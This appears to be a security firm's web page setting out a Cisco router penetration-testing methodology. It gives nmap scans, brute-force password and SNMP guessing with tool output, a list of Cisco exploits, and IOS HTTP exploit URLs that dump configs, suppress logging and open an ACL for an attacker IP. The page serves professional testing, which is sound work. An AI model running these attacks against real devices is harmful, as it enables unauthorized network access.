Telephone: 732-763-2814
Email: service@infosecpro.com

T O P   T H R E A T S :

Abuse of Cloud Computing

Insecure Interfaces and APIs
Malicious Insiders
Shared Technology Issues
Data Loss or Leakage
Account or Service Hijacking
Unknown Risk Profile


Common Exploits

Server Specific
Network Specific
CISCO Specific

CITRIX Specific

T E S T I N G   S T E P S

Password Craking

Cisco Specific Testing:


  • Scan & Fingerprint.
    • The purpose of 'Scan & Fingerprint' is to identify open ports on the target device and attempt to determine the exact IOS version.  This then sets the plan for further attacks.

    • It Telnet is active, then password guessing attacks should be performed.

    • If SNMP is active, then community string guessing should be performed.
  • Credentials Guessing.
    • If a network engineer/administrator has configured just one Cisco device with a poor password, then the whole network is open to attack.  Attempting to connect with various usernames/passwords is a mandatory step to testing the level of security that the device offers.

    • Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!
  • Connect
    • Once you have identified the access credentials, whether that be HTTP, Telnet or SSH, then connect to the target device to identify further information.

    • If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.
  • Check for bugs
    • To check for known bugs, vulnerabilities or security flaws with the device, a good security scanner should be used.

      • The most widely knwon/ used are: Nessus, Retina, GFI LanGuard and Core Impact. 
      • There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln
  • Further your testing
    • To further the attack into the target network, some changes need to be made to the running-config file of the target device. There are two main categories for configuration files with Cisco routers - running-config and startup-confg:

      • running-config is the currently running configuration settings.  This gets loaded from the startup-config on boot.  This configuration file is editable and the changes are immediate.  Any changes will be lost once the router is rebooted.  It is this file that requires altering to maintain a non-permenant connection through to the internal network.  
      • startup-config is the boot up configuration file.  It is this file that needs altering to maintain a permenant  connection through to the internal network.  
    • Once you have access to the config files, you will need enable (privileged mode) access for this, you can add an access list rule to allow your IP address into the internal network.   The following ACL will allow the defined <IP> access to any internal IP address. So if the router is protecting a web server and an email server, this ACL will allow you to pass packets to those IP addresses on any port.  Therefore you should be able to port scan them efficiently.

      • #> access-list 100 permit ip <IP> any


Scan & Fingerprint.

  • Port Scanning
    • nmap
      • To effectively scan a Cisco device, both TCP and UDP ports across the whole range must be checked.
        There are a number of tools that can achieve the goal, however we will stick with nmap examples.

        • TCP scan: - This will perform a TCP scan, fingerprint, be verbose, scan ports 1-65535 against IP and output the results in normal mode to TCP.scan.txt file. nmap  -sT  -O  -v  -p  1-65535  <IP>  -oN  TCP.scan.txt

        • UDP scan: - This will perform a UDP scan, be verbose,  scan ports 1.65535 against IP and output the results in normal mode to UDP.scan.txt file. nmap  -sU  -v  -p  1-65535  <IP>  -oN  UDP.scan.txt

    • Other tools
      • ciscos is a scanner for discovering Cisco devices in a given CIDR network range.

        • Usage: ./ciscos <IP> <class> [option]
      • mass-scanner is a simple scanner for discovering Cisco devices within a given network range.
  • Fingerprinting
    • cisco-torch is a fingerprinter for Cisco routers. There are a number of different fingerprinting switches, such as SSH, telnet or HTTP e.g.  The -A switch should perform all scans, however I have found it to be unreliable.

      • BT cisco-torch-0.4b # cisco-torch.pl -A
        • List of targets contains 1 host(s) 14489:  

          Checking ...


          Description:Cisco IOS host (tested on 2611, 2950 and Aironet 1200 AP)

          Fingerprinting Successful

        • Cisco-IOS Webserver found  

          HTTP/1.1 401 Unauthorized

          Date: Mon, 01 Mar 1993 00:34:11 GMT

          Server: cisco-IOS Accept-Ranges: none

          WWW-Authenticate: Basic realm="level_15_access"

          401 Unauthorized

    • nmap version scan: - Once open ports have been identified, version scanning should be performed against them.  In this example, TCP ports 23 and 80 were found to be open.

      • TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt
      • UDP Port scan - nmap -sV -O -v -p 161,162 <IP> -oN UDP.version.txt


Credentials Guessing.

  • CAT (Cisco Auditing Tool): - This tool  extends beyond simple discovery and can perform dictionary based attacks against the Telnet server and SNMP agents.

    • ./CAT  -h  <IP>  -a  password.wordlist
    • BT cisco-auditing-tool-v.1.0 # CAT -h -a /tmp/dict.txt

      Guessing passwords:

      Invalid Password: 1234

      Invalid Password: 2read

      Invalid Password: 4changes

      Password Found: telnet

  • brute-enabler is an internal enable password guesser.  You require valid non-privilege mode credentials to use this tool, they can be either SSH or Telnet.

    • ./enabler <IP> [-u username] -p password /password.wordlist [port]
    • BT brute-enable-v.1.0.2 # ./enabler  telnet  /tmp/dict.txt 

      [`] OrigEquipMfr... wrong password

      [`] Cisco... wrong password

      [`] agent... wrong password

      [`] all... wrong password

      [`] possible password found: cisco

  • hydra: - hydra is a multi-functional password guessing tool.  It can connect and pass guessed credentials for many protocols and services, including Cisco Telnet which may only require a password. (Make sure that you limit the threads to 4 (-t 4) as it will just overload the Telnet server!).

    • BT tmp # hydra  -l  ""  -P  password.wordlist  -t  4  <IP>  cisco
    • Hydra (http://www.thc.org) starting at 2007-02-26 10:54:10 [DATA] 4 tasks, 1 servers, 59 login tries (l:1/p:59),

      ~14 tries per task [DATA] attacking service cisco on port 23

      Error: Child with pid 21671 was disconnected - retrying (1 of 1 retries)

      [STATUS] attack finished for (waiting for childs to finish)

      [23][cisco] host:   login:    password: telnet

  • SNMP Attacks.

    • CAT (Cisco Auditing Tool): - This tool  extends beyond simple discovery and can perform dictionary based attacks against the Telnet server and SNMP agents.

      • ./CAT  -h  <IP>  -w  SNMP.wordlist
      • BT cisco-auditing-tool-v.1.0# CAT -h -w /tmp/snmp.txt

        Checking Host:

        Guessing passwords:

        Invalid Password: cisco

        Invalid Password: ciscos

        Guessing Community Names:

        Invalid Community Name: CISCO

        Invalid Community Name: OrigEquipMfr

        Community Name Found: Cisco

    • onesixtyone is a reliable SNMP community string guesser.   Once it identifies the correct community string, it will display accurate fingerprinting information.

      • onesixytone  -c  SNMP.wordlist  <IP>
      • BT onesixtyone-0.3.2 # onesixtyone  -c  dict.txt Scanning 1 hosts, 64 communities [enable] Cisco Internetwork Operating System Software   IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)  Technical Support: http://www.cisco.com/techsupport  Copyright (c) 1986-2005 by cisco Systems, Inc.  Compiled Fri 12-Aug [Cisco] Cisco Internetwork Operating System Software   IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)  Technical Support: http://www.cisco.com/techsupport  Copyright (c) 1986-2005 by cisco Systems, Inc.  Compiled Fri 12-Aug
    • snmpwalk: - snmpwalk is part of the SNMP toolkit.  After a valid community string is identified, you should use snmpwalk to 'walk' the SNMP Management Information Base (MIB) for further information.  Ensure that you get the correct version of SNMP protocol in use or it will not work correctly.  It may be a good idea to redirect the output to a text file for easier viewing as the tool outputs a large amount of text.

      • snmapwalk  -v  <Version>  -c  <Community string>  <IP>
      • BT# snmpwalk -v 1 -c enable

        SNMPv2-MIB::sysDescr.0 = STRING: Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.9.1.185 DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (363099) 1:00:30.99 SNMPv2-MIB::sysContact.0 = STRING: SNMPv2-MIB::sysName.0 = STRING: router SNMPv2-MIB::sysLocation.0 = STRING: SNMPv2-MIB::sysServices.0 = INTEGER: 78 SNMPv2-MIB::sysORLastChange.0 = Timeticks: (0) 0:00:00.00 IF-MIB::ifNumber.0 = INTEGER: 4



    • Telnet
      • The telnet service on Cisco devices can authenticate users based upon a password in the config file or against a RADIUS or TACACS server. If the device is simply using a VTY configuration for Telnet access, then it is likely that only a password is required to log on. If the device is passing authentication details to a RADIUS or TACACS server, then a combination of username and password will be required.

        •  telnet  <IP>
        • Sample Banners
          • VTY configuration:
            BT / # telnet
            Connected to
            Escape character is '^]'.
            User Access Verification

          • External authentication server:
            BT / # telnet
            Connected to
            Escape character is '^]'.
            User Access Verification
            Username: admin

    • SSH
    • Web Browser
      • HTTP/HTTPS: - Web based access can be achieved via a simple web browser, as long as the HTTP adminstration service is active on the target device:

        • This uses a combination of username and password to authenticate.  After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following:
        • Authentication Required Enter username and password for "level_15_access" at User Name: Password:
        • Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.
          • Cisco Systems Accessing Cisco 2610 "router"
            • Show diagnostic log - display the diagnostic log.
            • Monitor the router - HTML access to the command line interface at level 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
            • Show tech-support - display information commonly needed by tech support.

            • Extended Ping - Send extended ping commands.   

            • VPN Device Manager (VDM) - Configure and monitor Virtual Private Networks (VPNs) through the web interface.
    • TFTP
      • Trivial File Transfer Protocol is used to back up the config files of the router.  Should an attacker discover the enable password or RW SNMP community string, the config files are easy to retrieve.

        •  Cain & Abel -Cisco Configuration Download/Upload (CCDU)  With this tool the RW community string and the version of SNMP in use and running-config file can be downloaded to your local system. 

        • ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server.  Both of these tools require the config files to be saved with default names.
      • There are ways of extracting the config files directy from the router even if the names have changed, however you are really limited by the speed of the TFTP server to dictionary based attacks.  Cisco-torch is one of the tools that will do this.  It will attempt to retrieve config files listed in the brutefile.txt file:


    Check for Bugs

    • Attack Tools
      • Cisco Global Exploiter (CGE-13): - CGE is an attempt to combine all of the Cisco attacks into one tool.

        • perl cge.pl <target> <vulnerability number>

          • [1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability

          • [2] - Cisco IOS Router Denial of Service Vulnerability

          • [3] - Cisco IOS HTTP Auth Vulnerability

          • [4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability

          • [5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability

          • [6] - Cisco 675 Web Administration Denial of Service Vulnerability

          • [7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability

          •  [8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability

          • [9] - Cisco 514 UDP Flood Denial of Service Vulnerability

          • [10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability

          • [11] - Cisco Catalyst Memory Leak Vulnerability

          • [12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability

          • [13] - 0 Encoding IDS Bypass Vulnerability (UTF)
          • [14] - Cisco IOS HTTP Denial of Service Vulnerability
      • HTTP Arbitrary Access vulnerability: - A common security flaw (of its time!) was/is the HTTP Arbitrary Access vulnerability.  This flaw allowed an external attacker to execute router commands via the web interface.  Cisco devices have a number of  privilege levels, these levels start at 0 (User EXEC) and go up to 100, although mostly only the first 15  are used.  Level 15 is Privileged EXEC mode, the same as enable mode.  By referring to these levels within the URL of the target device, an attacker could pass commands to the router and have them execute in Privilege EXEC mode.

        • Web browse to the Cisco device: http://<IP>
        • Click cancel to the logon box and enter the following address:

          •  http://<IP>/level/99/exec/show/config (You may have to scroll through all of the levels from 16-99 for this to work.)

        • To raise the logging level to only log emergencies:

          • http://<IP>/level/99/configure/logging/trap/emergencies/CR
        • To add a rule to allow Telnet:

          • http://<IP>/level/99/configure/access-list/100/permit/ip/host/<Hacker-IP>/any/CR
      • ios-w3-vuln: - A CLI tool that automatically scrolls through all available privilege levels to identify if any are vulnerable to this attack, this tool is called ios-w3-vuln (although it may have other names.)  As well as identifying the vulnerable level, ios-w3-vuln will also attempt to TFTP download the running.config file to a TFTP server running locally. 

        • ./ios-w3-vul fetch > /tmp/router.txt
    • Common Vulnerabilities and Exploits (CVE) Information
      • Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cisco+IOS


    Configuration Files.

    The relevant configuration files that control a Cisco router are presented in a sample running-config file from a Cisco 2600 router running IOS version 12.2.

    • Configuration files explained
      • The line that reads "enable password router", where "router" is the password, is the TTY console password which is superceeded by the enable secret password for remote access.
      • Telnet Access. If telnet is configured on the VTY (Virtual TTY) interface, then the credentials will be in the config file: line vty 0 4 password telnet login

      • SNMP Settings. If the target router is configured to use SNMP, then the SNMP community strings will be in the config file.  It should have the read-only (RO) and may have the read-write (RW) strings: snmp-server community Cisco RO snmp-server community enable RW

      • Password Encryption Utilised
        • Enable password. The Holy Grail, the 'enable' password, the root level access to the router.  There are two main methods of storing the enable password in a config file, type 5 and type 7, MD5 hashed and Viginere encryption respectively. An example is: enable secret 5 $1$c2He$GWSkN1va8NJd2icna9TDA.    

          • Type 7 should be avoided as it is extremely easy to crack, it can even be done by hand!  An example Type 7 password is given below but does not exist in the example running-config file: enable password 7 104B0718071B17 They can be cracked with the following tools: 

          • Type 5 password protection is much more secure.  However, should an attacker get hold of the configuration file somehow, then the MD5 hash can be extracted and cracked offline with the following tools: 

              • Entered into a text file as follows: username:$1$c2He$GWSkN1va8NJd2icna9TDA.
      • version 12.2
        service config
        service timestamps debug datetime msec
        service timestamps log datetime msec
        no service password-encryption
        hostname vapt-router
        logging queue-limit 100
        enable secret 5 $1$c2He$GWSkN1va8NJd2icna9TDA.
        enable password router
        memory-size iomem 10
        ip subnet-zero
        no ip routing

        ip audit notify log
        ip audit po max-events 100
        no voice hpi capture buffer
        no voice hpi capture destination 
        mta receive maximum-recipients 0

        interface Ethernet0/0
         ip address
         no ip route-cache
         no ip mroute-cache
        interface Serial0/0
         no ip address
         no ip route-cache
         no ip mroute-cache
        ip http server
        no ip http secure-server
        ip classless

        snmp-server community Cisco RO
        snmp-server community enable RW
        snmp-server enable traps tty
        call rsvp-sync
        mgcp profile default
        dial-peer cor custom
        line con 0
        line aux 0
        line vty 0 4
        password telnet

    • Configuration Testing Tools


    Other members of our business group:

    COPYRIGHT (C) 2000 - 2011 InfoSecPro.com ALL RIGHTS RESERVED